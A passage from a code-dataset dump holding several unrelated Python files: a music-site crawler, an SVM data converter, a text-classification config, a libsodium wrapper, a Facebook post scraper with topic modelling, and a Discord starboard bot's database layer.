print('----')\n\n if not page_count:\n page_count = 1\n\n # get song of artists\n artist_song_dict = dict()\n \n def artist_song_map(url_artist):\n try: return get_song_list(url_artist)\n except Exception as e:\n print('Error:', url_artist, e)\n return None, None\n \n with ThreadPoolExecutor(max_workers=10) as executor:\n for url_artist, song_name_list in executor.map(artist_song_map, url_artist_list):\n if url_artist is None: continue\n artist_count += 1\n song_count += len(song_name_list)\n artist_name = url_artist.split('/')[-1]\n artist_song_dict[artist_name] = song_name_list\n \n print(artist_name)\n print(' > ' + '\\n > '.join(song_name_list))\n \n archive_artist[ch] = artist_song_dict\n list_pages.append(page_count)\n\n print('=======================================================')\n print(list_pages)\n print('Artists:', artist_count)\n print('Songs:', song_count)\n\n archive_artist['num_song'] = song_count\n archive_artist['num_artist'] = artist_count\n\n return archive_artist\n\n\nif __name__ == '__main__':\n\n if not os.path.exists(root_dir):\n os.makedirs(root_dir)\n\n if not os.path.exists(root_xml):\n os.makedirs(root_xml)\n\n path_artists = os.path.join(root_dir, 'archive_artist.json')\n \n archive_artist = traverse_website()\n \n # Merge old json\n if os.path.exists(path_artists):\n with open(path_artists, \"r\") as f:\n archive_artist = {**json.load(f), **archive_artist}\n \n with open(path_artists, \"w\") as f:\n json.dump(archive_artist, f)\n\n with open(path_artists, \"r\") as f:\n archive_artist = json.load(f)\n\n song_count = archive_artist['num_song']\n\n\n for ch in alphabet_list:\n path_ch = os.path.join(root_xml, ch)\n print('==[%c]=================================================' % ch)\n\n if not os.path.exists(path_ch):\n os.makedirs(path_ch)\n\n songs = []\n for a_name, s_list in archive_artist[ch].items():\n for s_name in s_list:\n path_song = os.path.join(path_ch, a_name, s_name)\n if os.path.exists(path_song): continue\n songs.append((a_name, s_name, path_song))\n\n def song_map(args):\n os.makedirs(args[-1], exist_ok=True)\n try: return song_retrieval(*args)\n except Exception as e:\n print('Error:', args, e)\n return None, None, None\n\n with ThreadPoolExecutor(max_workers=10) as executor:\n for idx, (artist, song, path_song) in enumerate(executor.map(song_map, songs)):\n if artist is None: continue\n print('(%3d/%3d) %s %s' % (idx, len(songs), artist, song))","sub_path":"src/theorytab_crawler.py","file_name":"theorytab_crawler.py","file_ext":"py","file_size_in_byte":6484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"281627357","text":"import numpy\nimport itertools\n\nfc7 = numpy.load('./PIPA_300kclothing_val_feature_01_new.npy')\nfk = open('/home/ytshen/work/datasets/PIPA/body_svm_01_new.txt','r')\nfl = open('./svm_300kclothing_train_01_new.txt','w')\nclass_temp = []\nread_from_ori = fk.readlines()\nfinal_opt = [[]]\n\n\n############################################\nfor i in range(len(read_from_ori)):\n\tb = read_from_ori[i].split(' ')\n\ttemp_id = b[1].strip()\n\tclass_temp.append(temp_id)\n\n\n###########################################\n# for i in range(len(fc7) - len(read_from_ori)):\n# \tb = 
read_from_ori[i].split(' ')\n# \ttemp_id = b[1].strip()\n# \tclass_temp.append(temp_id)\n############################################\n\n\nfor i in range(len(fc7)):\n\tfinal_opt[i].append(class_temp[i])\n\tfinal_opt.append([])\n\tfor j in range(len(fc7[i])):\n\t\tfinal_opt[i].append(' ')\n\t\tfinal_opt[i].append('%d' % (j+1))\n\t\tfinal_opt[i].append(':')\n\t\tfinal_opt[i].append('%f' % fc7[i][j])\n\n\tfinal_opt[i].append('\\n')\n\nfinal_opt.remove(final_opt[len(final_opt)-1])\t\n\nfk.close()\n\n\n\n#############################################\nfor i in range(len(final_opt)):\n\ttemp_str = \"\".join(final_opt[i])\n\tfl.write(temp_str)\n\nfl.close()\n\n\n\n\n","sub_path":"generate_data_for_svm.py","file_name":"generate_data_for_svm.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"202767346","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n# @time : 2021/2/23 21:34\n# @author : Mo\n# @function: multi-class classification; the label is treated as multi-class vs. multi-label depending on whether it contains the |myz| separator\n\n\n# adapt to linux\nimport platform\nimport json\nimport sys\nimport os\npath_root = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\npath_sys = os.path.join(path_root, \"pytorch_nlu\", \"pytorch_textclassification\")\nprint(path_root)\n# imports from the classification package, pytorch_textclassification\nfrom tcTools import get_current_time\nfrom tcRun import TextClassification\nfrom tcConfig import model_config\n\n\n# pretrained-model directory; on local win10 the default runs only 2 steps before evaluating and saving the model\nif platform.system().lower() == 'windows':\n pretrained_model_dir = \"D:/pretrain_models/pytorch\"\n evaluate_steps = 2 # evaluation steps\n save_steps = 2 # save steps\nelse:\n pretrained_model_dir = \"/pretrain_models/pytorch\"\n evaluate_steps = 320 # evaluation steps\n save_steps = 320 # save steps\n ee = 0\n\n\nif __name__ == \"__main__\":\n # train/dev corpus paths; only the train path is required\n path_corpus = os.path.join(path_root, \"corpus\", \"text_classification\", \"tnews\")\n path_train = os.path.join(path_corpus, \"train.json\")\n path_dev = os.path.join(path_corpus, \"dev.json\")\n model_config[\"evaluate_steps\"] = evaluate_steps # evaluation steps\n model_config[\"save_steps\"] = save_steps # save steps\n model_config[\"path_train\"] = path_train # training corpus, required\n model_config[\"path_dev\"] = path_dev # dev corpus, may be None\n model_config[\"path_tet\"] = None # test corpus, may be None\n # multi-class: choose from None(BCE), BCE, BCE_LOGITS, MSE, FOCAL_LOSS, DICE_LOSS, LABEL_SMOOTH, MIX;\n # multi-label: SOFT_MARGIN_LOSS, PRIOR_MARGIN_LOSS, FOCAL_LOSS, CIRCLE_LOSS, DICE_LOSS, MIX, etc.\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(model_config[\"CUDA_VISIBLE_DEVICES\"])\n\n # supported pretrained-model classes\n model_type = [\"BERT\", \"ERNIE\", \"BERT_WWM\", \"ALBERT\", \"ROBERTA\", \"XLNET\", \"ELECTRA\"]\n pretrained_model_name_or_path = {\n \"BERT_WWM\": pretrained_model_dir + \"/chinese_wwm_pytorch\",\n \"ROBERTA\": pretrained_model_dir + \"/chinese_roberta_wwm_ext_pytorch\",\n \"ALBERT\": pretrained_model_dir + \"/albert_base_v1\",\n \"XLNET\": pretrained_model_dir + \"/chinese_xlnet_mid_pytorch\",\n \"ERNIE\": pretrained_model_dir + \"/ERNIE_stable-1.0.1-pytorch\",\n # \"ERNIE\": pretrained_model_dir + \"/ernie-tiny\", # small model\n \"BERT\": pretrained_model_dir + \"/bert-base-chinese\",\n }\n idx = 0 # index of the chosen pretrained model type in model_type; 0 is BERT, 1 is ERNIE\n model_config[\"pretrained_model_name_or_path\"] = pretrained_model_name_or_path[model_type[idx]]\n # model_config[\"model_save_path\"] = \"../output/text_classification/model_{}\".format(model_type[idx] + \"_\" + str(get_current_time()))\n model_config[\"model_save_path\"] = 
\"../output/text_classification/model_{}\".format(model_type[idx])\n model_config[\"model_type\"] = model_type[idx]\n # main\n lc = TextClassification(model_config)\n lc.process()\n lc.train()\n\n\n# shell\n# nohup python tcRun.py > tc.log 2>&1 &\n# tail -n 1000 -f tc.log\n# |myz|\n\n","sub_path":"test/tc/tet_tc_base_multi_class.py","file_name":"tet_tc_base_multi_class.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"338808385","text":"#!/usr/bin/env python2\n\"\"\"\nWrapper for libsodium library\n\nCopyright (c) 2013-2014, Marsiske Stefan.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport ctypes\n\nsodium = ctypes.cdll.LoadLibrary(\"libsodium.so\")\ncrypto_box_NONCEBYTES = 24\ncrypto_box_PUBLICKEYBYTES = 32\ncrypto_box_SECRETKEYBYTES = 32\ncrypto_box_ZEROBYTES = 32\ncrypto_box_BOXZEROBYTES = 16\ncrypto_box_MACBYTES = crypto_box_ZEROBYTES - crypto_box_BOXZEROBYTES\ncrypto_secretbox_KEYBYTES = 32\ncrypto_secretbox_NONCEBYTES = 24\ncrypto_secretbox_KEYBYTES = 32\ncrypto_secretbox_ZEROBYTES = 32\ncrypto_secretbox_BOXZEROBYTES = 16\ncrypto_secretbox_MACBYTES = crypto_secretbox_ZEROBYTES - crypto_secretbox_BOXZEROBYTES\ncrypto_sign_PUBLICKEYBYTES = 32\ncrypto_sign_SECRETKEYBYTES = 64\ncrypto_sign_SEEDBYTES = 32\ncrypto_stream_KEYBYTES = 32\ncrypto_stream_NONCEBYTES = 24\ncrypto_generichash_BYTES = 32\ncrypto_scalarmult_curve25519_BYTES = 32\ncrypto_scalarmult_BYTES = 32\ncrypto_sign_BYTES = 64\n\n\"\"\"\ntypedef struct crypto_generichash_blake2b_state {\n uint64_t h[8];\n uint64_t t[2];\n uint64_t f[2];\n uint8_t buf[256];\n size_t buflen;\n uint8_t last_node;\n ...;\n} crypto_generichash_state;\n\"\"\"\ncrypto_generichash_state = 8*12 + 256 + ctypes.sizeof(ctypes.c_size_t) + 1\n\ndef crypto_scalarmult_curve25519(n,p):\n buf = ctypes.create_string_buffer(crypto_scalarmult_BYTES)\n sodium.crypto_scalarmult_curve25519(buf, n, p)\n return buf.raw\n\ndef crypto_scalarmult_curve25519_base(n):\n buf = ctypes.create_string_buffer( crypto_scalarmult_BYTES)\n sodium.crypto_scalarmult_curve25519_base(buf, n)\n return buf.raw\n\n\n# crypto_generichash(unsigned char *out, size_t outlen, const unsigned char *in, unsigned long long inlen, const unsigned char *key, size_t 
keylen)\ndef crypto_generichash(m, k=b'', outlen=crypto_generichash_BYTES):\n buf = ctypes.create_string_buffer(outlen)\n if not sodium.crypto_generichash(buf, ctypes.c_uint(outlen), m, ctypes.c_ulonglong(len(m)), k, ctypes.c_uint(len(k))) == 0:\n raise ValueError\n return buf.raw\n\n#crypto_generichash_init(crypto_generichash_state *state, const unsigned char *key, const size_t keylen, const size_t outlen);\ndef crypto_generichash_init(outlen=crypto_generichash_BYTES, k=b''):\n buf = ctypes.create_string_buffer(crypto_generichash_state)\n sodium.crypto_generichash_init(buf, k, ctypes.c_ulonglong(len(k)), outlen)\n return buf.raw\n\n#crypto_generichash_update(crypto_generichash_state *state, const unsigned char *in, unsigned long long inlen);\ndef crypto_generichash_update(state, m):\n sodium.crypto_generichash_update(state, m, ctypes.c_ulonglong(len(m)))\n return state\n\n#crypto_generichash_final(crypto_generichash_state *state, unsigned char *out, const size_t outlen);\ndef crypto_generichash_final(state, outlen=crypto_generichash_BYTES):\n buf = ctypes.create_string_buffer(outlen)\n sodium.crypto_generichash_final(state, buf, outlen)\n return buf.raw\n\ndef randombytes(size):\n buf = ctypes.create_string_buffer(size)\n sodium.randombytes(buf, ctypes.c_ulonglong(size))\n return buf.raw\n\ndef crypto_box_keypair():\n pk = ctypes.create_string_buffer( crypto_box_PUBLICKEYBYTES)\n sk = ctypes.create_string_buffer( crypto_box_SECRETKEYBYTES)\n if not sodium.crypto_box_keypair(pk, sk) == 0:\n raise ValueError\n return (pk.raw, sk.raw)\n\ndef crypto_box(msg, nonce, pk, sk):\n if None in (msg, nonce, pk, sk): raise ValueError\n padded = b\"\\x00\" * crypto_box_ZEROBYTES + msg\n c = ctypes.create_string_buffer( len(padded))\n if not sodium.crypto_box(c, padded, ctypes.c_ulonglong(len(padded)), nonce, pk, sk) == 0:\n raise ValueError\n return c.raw[crypto_box_BOXZEROBYTES:]\n\ndef crypto_box_open(c, nonce, pk, sk):\n if None in (c, nonce, pk, sk): raise ValueError\n padded = b\"\\x00\" * crypto_box_BOXZEROBYTES + c\n msg = ctypes.create_string_buffer( len(padded))\n if not sodium.crypto_box_open(msg, padded, ctypes.c_ulonglong(len(padded)), nonce, pk, sk) == 0:\n raise ValueError\n return msg.raw[crypto_box_ZEROBYTES:]\n\ndef crypto_secretbox(msg, nonce, k):\n if None in (msg, nonce, k): raise ValueError\n padded = b\"\\x00\" * crypto_secretbox_ZEROBYTES + msg\n c = ctypes.create_string_buffer( len(padded))\n if not sodium.crypto_secretbox(c, padded, ctypes.c_ulonglong(len(padded)), nonce, k) == 0:\n raise ValueError\n return c.raw[crypto_secretbox_BOXZEROBYTES:]\n\ndef crypto_secretbox_open(c, nonce, k):\n if None in (c, nonce, k): raise ValueError\n padded = b\"\\x00\" * crypto_secretbox_BOXZEROBYTES + c\n msg = ctypes.create_string_buffer( len(padded))\n if not sodium.crypto_secretbox_open(msg, padded, ctypes.c_ulonglong(len(padded)), nonce, k) == 0:\n raise ValueError\n return msg.raw[crypto_secretbox_ZEROBYTES:]\n\ndef crypto_sign_keypair():\n pk = ctypes.create_string_buffer(crypto_sign_PUBLICKEYBYTES)\n sk = ctypes.create_string_buffer(crypto_sign_SECRETKEYBYTES)\n if not sodium.crypto_sign_keypair(pk, sk) == 0:\n raise ValueError\n return (pk.raw, sk.raw)\n\ndef crypto_sign_seed_keypair(seed):\n pk = ctypes.create_string_buffer(crypto_sign_PUBLICKEYBYTES)\n sk = ctypes.create_string_buffer(crypto_sign_SECRETKEYBYTES)\n if not sodium.crypto_sign_seed_keypair(pk, sk, seed) == 0:\n raise ValueError\n return (pk.raw, sk.raw)\n\ndef crypto_sign(m, sk):\n if None in (m, sk): raise ValueError\n 
smsg = ctypes.create_string_buffer(len(m)+crypto_sign_BYTES)\n smsglen = ctypes.pointer(ctypes.c_ulonglong())\n if not sodium.crypto_sign(smsg, smsglen, m, ctypes.c_ulonglong(len(m)), sk) == 0:\n raise ValueError\n return smsg.raw\n\ndef crypto_sign_open(sm, pk):\n if None in (sm, pk): raise ValueError\n msg = ctypes.create_string_buffer(len(sm))\n msglen = ctypes.c_ulonglong()\n msglenp = ctypes.pointer(msglen)\n if not sodium.crypto_sign_open(msg, msglenp, sm, ctypes.c_ulonglong(len(sm)), pk) == 0:\n raise ValueError\n return msg.raw[:msglen.value]\n\ndef crypto_stream(cnt, nonce = None, key = None):\n res = ctypes.create_string_buffer(cnt)\n if not nonce:\n nonce = randombytes(crypto_stream_NONCEBYTES)\n if not key:\n key = randombytes(crypto_stream_KEYBYTES)\n if not sodium.crypto_stream(res, ctypes.c_ulonglong(cnt), nonce, key) == 0:\n raise ValueError\n return res.raw\n\ndef crypto_stream_xor(msg, cnt, nonce = None, key = None):\n res = ctypes.create_string_buffer(cnt)\n if not nonce:\n nonce = randombytes(crypto_stream_NONCEBYTES)\n if not key:\n key = randombytes(crypto_stream_KEYBYTES)\n if not sodium.crypto_stream_xor(res, msg, ctypes.c_ulonglong(cnt), nonce, key) == 0:\n raise ValueError\n return res.raw\n\ndef test():\n import binascii\n\n crypto_stream(8)\n crypto_stream(1337)\n print(binascii.hexlify(crypto_stream(8)))\n print(binascii.hexlify(crypto_stream(16)))\n print(binascii.hexlify(crypto_stream(32)))\n print(binascii.hexlify(crypto_stream_xor('howdy', len('howdy'))))\n print(binascii.hexlify(crypto_stream_xor('howdy' * 16, len('howdy')*16)))\n\n print(binascii.hexlify(crypto_generichash('howdy')))\n state = crypto_generichash_init()\n state = crypto_generichash_update(state, 'howdy')\n print(binascii.hexlify(crypto_generichash_final(state)))\n print(binascii.hexlify(crypto_generichash('howdy', outlen=4)))\n print(binascii.hexlify(crypto_generichash('howdy', outlen=8)))\n state = crypto_generichash_init(outlen=6)\n state = crypto_generichash_update(state, 'howdy')\n print(binascii.hexlify(crypto_generichash_final(state, outlen=6)))\n\n pk, sk = crypto_box_keypair()\n n = randombytes(crypto_box_NONCEBYTES)\n c = crypto_box(\"howdy\", n, pk, sk)\n print(crypto_box_open(c, n, pk, sk))\n\n k = randombytes(crypto_secretbox_KEYBYTES)\n n = randombytes(crypto_secretbox_NONCEBYTES)\n c = crypto_secretbox(\"howdy\", n, k)\n print(crypto_secretbox_open(c, n, k))\n\n s = crypto_scalarmult_curve25519_base(randombytes(crypto_scalarmult_BYTES))\n r = crypto_scalarmult_curve25519_base(randombytes(crypto_scalarmult_BYTES))\n print('scalarmult')\n print(repr(crypto_scalarmult_curve25519(s,r)))\n\n pk, sk = crypto_sign_keypair()\n signed = crypto_sign('howdy',sk)\n changed = signed[:crypto_sign_BYTES]+'0'+signed[crypto_sign_BYTES+1:]\n print(crypto_sign_open(signed, pk))\n try:\n crypto_sign_open(changed, pk)\n except ValueError:\n print(\"signature failed to verify for changed payload\")\n\n seed = crypto_generichash('howdy', outlen=crypto_sign_SEEDBYTES)\n pk, sk = crypto_sign_seed_keypair(seed)\n pk2, sk2 = crypto_sign_seed_keypair(seed)\n print(binascii.hexlify(pk))\n print(binascii.hexlify(pk2))\n assert pk == pk2\n assert sk == sk2\n\nif __name__ == '__main__':\n test()\n","sub_path":"pysodium.py","file_name":"pysodium.py","file_ext":"py","file_size_in_byte":10031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"344991638","text":"import urllib\nimport json\nimport datetime\nimport csv\nimport urllib\nfrom bs4 import 
BeautifulSoup\nfrom nltk import sent_tokenize, word_tokenize, pos_tag\nimport nltk\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport codecs\n\nreader = codecs.getreader(\"utf-8\")\n\napp_id = \"12345\"\napp_secret = \"12345\"\n\naccess_token = app_id + \"|\" + app_secret\n\npage_id = 'costco'\n\ndef feedFacebook(page_id, access_token,num_statuses):\n base = \"https://graph.facebook.com/v2.8\"\n node = \"/\" + page_id + \"/feed\"\n parameters = \"/?fields=message,link,likes.limit(1).summary(true),comments.limit(1).summary(true),shares&limit=%s&access_token=%s\" % (num_statuses, access_token) # changed url = base + node +parameters\n url = base + node + parameters\n print(url)\n response = urllib.request.urlopen(url)\n data = json.load(reader(response))\n print(json.dumps(data, indent=4, sort_keys=True))\n b=json.dumps(data, indent=4, sort_keys=True)\n return data\na=feedFacebook(page_id, access_token,100)\n\na['data'][0]['message']\n\nfor k in range(0,10):\n print(a['data'][k]['message'])\n\ntxt=[]\nshare=[]\nfor i in range(0,50):\n txt.append(a['data'][0]['message'])\n\ntxt\n\ntokens = word_tokenize(str(a))\ntokens\n\nlong_words1 = [w for w in tokens if 7 1]\n for text in texts]\nfrom pprint import pprint # pretty-printer\npprint(texts)\n\ndictionary = corpora.Dictionary(texts)\ndictionary.save('/tmp/deerwester4.dict')\n\nprint(dictionary.token2id)\n\n\n## VETOR DAS FRASES\ncorpus = [dictionary.doc2bow(text) for text in texts]\ncorpora.MmCorpus.serialize('/tmp/deerwester4.mm', corpus) # store to disk, for later use\nprint(corpus)\n\nfrom gensim import corpora, models, similarities\ntfidf = models.TfidfModel(corpus) # step 1 -- initialize a model\n\n\ncorpus_tfidf = tfidf[corpus]\nfor doc in corpus_tfidf:\n print(doc)\n\nlsi = models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=2) # initialize an LSI transformation\ncorpus_lsi = lsi[corpus_tfidf] # create a double wrapper over the original corpus: bow->tfidf->fold-in-lsi\n\nlsi.print_topics(2)\n\n## COORDENADAS DOS TEXTOS\ntodas=[]\nfor doc in corpus_lsi: # both bow->tfidf and tfidf->lsi transformations are actually executed here, on the fly\n todas.append(doc)\ntodas\n\nfrom gensim import corpora, models, similarities\ndictionary = corpora.Dictionary.load('/tmp/deerwester4.dict')\ncorpus = corpora.MmCorpus('/tmp/deerwester4.mm') # comes from the first tutorial, \"From strings to vectors\"\nprint(corpus)\n\nnp.array(corpus).shape\n\nlsi = models.LsiModel(corpus, id2word=dictionary, num_topics=2)\n\n\np=[]\nfor i in range(0,len(documents)):\n doc1 = documents[i]\n vec_bow2 = dictionary.doc2bow(doc1.lower().split())\n vec_lsi2 = lsi[vec_bow2] # convert the query to LSI space\n p.append(vec_lsi2)\n \np\n \nindex = similarities.MatrixSimilarity(lsi[corpus]) # transform corpus to LSI space and index it\n\nindex.save('/tmp/deerwester4.index')\nindex = similarities.MatrixSimilarity.load('/tmp/deerwester4.index')\n\n#################\n\nimport gensim\nimport numpy as np\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\nimport matplotlib as mpl\n\nmatrix1 = gensim.matutils.corpus2dense(p, num_terms=2)\nmatrix3=matrix1.T\nmatrix3\n\nfrom sklearn import manifold, datasets, decomposition, ensemble,discriminant_analysis, random_projection\n\ndef norm(x):\n return (x-np.min(x))/(np.max(x)-np.min(x))\n\nX=norm(matrix3)\n\ntsne = manifold.TSNE(n_components=2, init='pca', random_state=0,perplexity=50,verbose=1,n_iter=1500)\nX_tsne = tsne.fit_transform(X)\n\n### WORK HERE - COMO DESCOBRI QUE TINHA 3 CLUSTERS ???? 
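# ---- editor's note (illustrative sketch, not part of the original record) ----
# The comment above asks (in Portuguese) how the number of clusters was found.
# A common heuristic is the "elbow" method: fit KMeans for a range of k and look
# for the bend in the inertia curve. The data below is synthetic, for illustration only.
import numpy as np
from sklearn.cluster import KMeans

rng = np.random.default_rng(0)
X_demo = np.vstack([rng.normal(loc=c, scale=0.1, size=(50, 2)) for c in (0, 1, 2)])
inertias = [KMeans(n_clusters=k, n_init=10, random_state=0).fit(X_demo).inertia_
            for k in range(1, 8)]
# the inertia drops sharply up to k=3 and flattens afterwards -- the "elbow" at 3 clusters
print([round(v, 2) for v in inertias])
# ---- end editor's note ----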
SORT X_tsne\n\nfrom sklearn.cluster import KMeans\nmodel3=KMeans(n_clusters=10,random_state=0)\nmodel3.fit(X)\ncc=model3.predict(X)\n\n## ALSO TRY COM X PARA VER QUE TOPICO SELECIONA\n\ntokens2 = word_tokenize(str(sentences[0:10]))\ntokens2\n\n## ADJUST HERE\nlong_words12 = [w for w in tokens2 if 5 self.limit:\n self._messages[guild].pop(0)\n\n async def get(self, guild: int, **kwargs):\n async with self.lock:\n return utils.get(self._messages.get(guild, []), **kwargs)\n\n async def remove(self, msg_id: int, guild: int):\n status = False\n async with self.lock:\n remove_index = None\n for x, msg in enumerate(self._messages.get(guild, [])):\n if msg.id == msg_id:\n remove_index = x\n if remove_index is not None:\n self._messages[guild].pop(remove_index)\n status = True\n return status\n\n async def set_listeners(self, event):\n @event\n async def on_raw_message_delete(payload):\n if payload.guild_id is None:\n return\n await self.remove(payload.message_id, payload.guild_id)\n\n @event\n async def on_message_edit(before, after):\n if before.guild is None:\n return\n status = await self.remove(before.id, before.guild.id)\n if status is True:\n await self.push(after, after.guild.id)\n\n @event\n async def on_raw_bulk_message_delete(payload):\n if payload.guild_id is None:\n return\n ids = payload.message_ids\n for id in ids:\n await self.remove(id, payload.guild_id)\n\n\nclass CommonSql(aobject):\n async def __init__(self, conn):\n self.create_guild = \\\n await conn.prepare(\n \"\"\"INSERT INTO guilds (id) VALUES($1)\"\"\"\n )\n self.create_prefix = \\\n await conn.prepare(\n \"\"\"INSERT INTO prefixes (guild_id, prefix)\n VALUES($1, $2)\"\"\"\n )\n self.create_user = \\\n await conn.prepare(\n \"\"\"INSERT INTO users (id, is_bot)\n VALUES($1, $2)\"\"\"\n )\n self.create_patron = \\\n await conn.prepare(\n \"\"\"INSERT INTO patrons (user_id, product_id)\n VALUES($1, $2)\"\"\"\n )\n self.create_vote = \\\n await conn.prepare(\n \"\"\"INSERT INTO votes (user_id, expires)\n VALUES($1, $2)\"\"\"\n )\n self.create_donation = \\\n await conn.prepare(\n \"\"\"INSERT INTO donations\n (txn_id, user_id, product_id, role_id, guild_id,\n email, price, currency, recurring, status)\n VALUES($1,$2,$3,$4,$5,$6,$7,$8,$9,$10)\"\"\"\n )\n self.create_member = \\\n await conn.prepare(\n \"\"\"INSERT INTO members (user_id, guild_id)\n VALUES($1,$2)\"\"\"\n )\n self.create_starboard = \\\n await conn.prepare(\n \"\"\"INSERT INTO starboards (id, guild_id)\n VALUES($1,$2)\"\"\"\n )\n self.create_sbemoji = \\\n await conn.prepare(\n \"\"\"INSERT INTO sbemojis (d_id, starboard_id,\n name, is_downvote)\n VALUES($1,$2,$3,$4)\"\"\"\n )\n self.create_aschannel = \\\n await conn.prepare(\n \"\"\"INSERT INTO aschannels (id, guild_id)\n VALUES($1, $2)\"\"\"\n )\n self.create_asemoji = \\\n await conn.prepare(\n \"\"\"INSERT INTO asemojis (aschannel_id, name)\n VALUES($1, $2)\"\"\"\n )\n self.create_message = \\\n await conn.prepare(\n \"\"\"INSERT INTO messages (id, guild_id,\n user_id, orig_message_id, channel_id,\n is_orig, is_nsfw)\n VALUES($1,$2,$3,$4,$5,$6,$7)\"\"\"\n )\n self.create_reaction = \\\n await conn.prepare(\n \"\"\"INSERT INTO reactions (guild_id,\n user_id, message_id, name)\n VALUES ($1,$2,$3,$4)\"\"\"\n )\n\n self.update_starboard = \\\n await conn.prepare(\n \"\"\"UPDATE starboards\n SET self_star=$1,\n link_edits=$2,\n link_deletes=$3,\n bots_on_sb=$4,\n required=$5,\n rtl=$6\n WHERE id=$7\"\"\"\n )\n\n\nclass Database:\n def __init__(self):\n self.lock = Lock()\n self.cooldowns = {\n 'giving_stars': {} 
# {user_id: cooldown_end_datetime}\n }\n self.conn = None\n\n async def open(self, bot):\n # self.q = await CommonSql()\n await self._create_tables()\n self.q = await CommonSql(await self.connect())\n self.cache = await BotCache(bot.event)\n\n async def connect(self):\n if self.conn is None:\n self.conn = await self.make_connection()\n return self.conn\n\n async def make_connection(self):\n conn = None\n try:\n conn = await apg.connect(\n host='localhost', database='starboard',\n user='starboard', password=db_pwd\n )\n # await conn.execute(\n # \"PRAGMA foreign_keys=True\"\n # )\n # conn.row_factory = self._dict_factory\n except Exception as e:\n print(f\"Couldn't connect to database: {e}\")\n if conn:\n await conn.close()\n return conn\n\n def _dict_factory(self, cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n async def _create_table(self, sql):\n conn = await self.connect()\n await conn.execute(sql)\n\n async def _create_index(self, sql):\n conn = await self.connect()\n await conn.execute(sql)\n\n async def _create_tables(self):\n guilds_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS guilds (\n id numeric PRIMARY KEY,\n\n stars_given integer NOT NULL DEFAULT 0,\n stars_recv integer NOT NULL DEFAULT 0\n )\"\"\"\n\n prefixes_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS prefixes (\n id SERIAL PRIMARY KEY,\n guild_id numeric NOT NULL,\n prefix VARCHAR(8),\n\n FOREIGN KEY (guild_id) REFERENCES guilds (id)\n ON DELETE CASCADE\n )\"\"\"\n\n users_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS users (\n id numeric PRIMARY KEY,\n is_bot bool NOT NULL,\n\n lvl_up_msgs bool DEFAULT True\n )\"\"\"\n\n patrons_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS patrons (\n id SERIAL PRIMARY KEY,\n user_id numeric NOT NULL,\n product_id text NOT NULL\n )\"\"\"\n\n votes_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS votes (\n id SERIAL PRIMARY KEY,\n user_id numeric NOT NULL,\n expires numeric NOT NULL,\n expired bool DEFAULT false,\n\n FOREIGN KEY (user_id) REFERENCES users (id)\n ON DELETE CASCADE\n )\"\"\"\n\n donations_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS donations (\n id SERIAL PRIMARY KEY,\n txn_id integer NOT NULL,\n user_id integer NOT NULL,\n product_id text DEFAULT NULL,\n role_id numeric DEFAULT NULL,\n guild_id integer NOT NULL,\n\n email text NOT NULL,\n price integer NOT NULL,\n currency text NOT NULL,\n\n recurring bool NOT NULL,\n status text NOT NULL\n )\"\"\"\n\n members_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS members (\n id SERIAL PRIMARY KEY,\n user_id numeric NOT NULL,\n guild_id numeric NOT NULL,\n\n given int NOT NULL DEFAULT 0,\n received int NOT NULL DEFAULT 0,\n\n xp int NOT NULL DEFAULT 0,\n lvl int NOT NULL DEFAULT 0,\n\n FOREIGN KEY (user_id) REFERENCES users (id)\n ON DELETE CASCADE,\n FOREIGN KEY (guild_id) REFERENCES guilds (id)\n ON DELETE CASCADE\n )\"\"\"\n\n starboards_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS starboards (\n id numeric PRIMARY KEY,\n guild_id numeric NOT NULL,\n\n required int NOT NULL DEFAULT 3,\n rtl int NOT NULL DEFAULT 0,\n\n self_star bool NOT NULL DEFAULT false,\n link_edits bool NOT NULL DEFAULT true,\n link_deletes bool NOT NULL DEFAULT false,\n bots_on_sb bool NOT NULL DEFAULT true,\n\n locked bool NOT NULL DEFAULT false,\n\n FOREIGN KEY (guild_id) 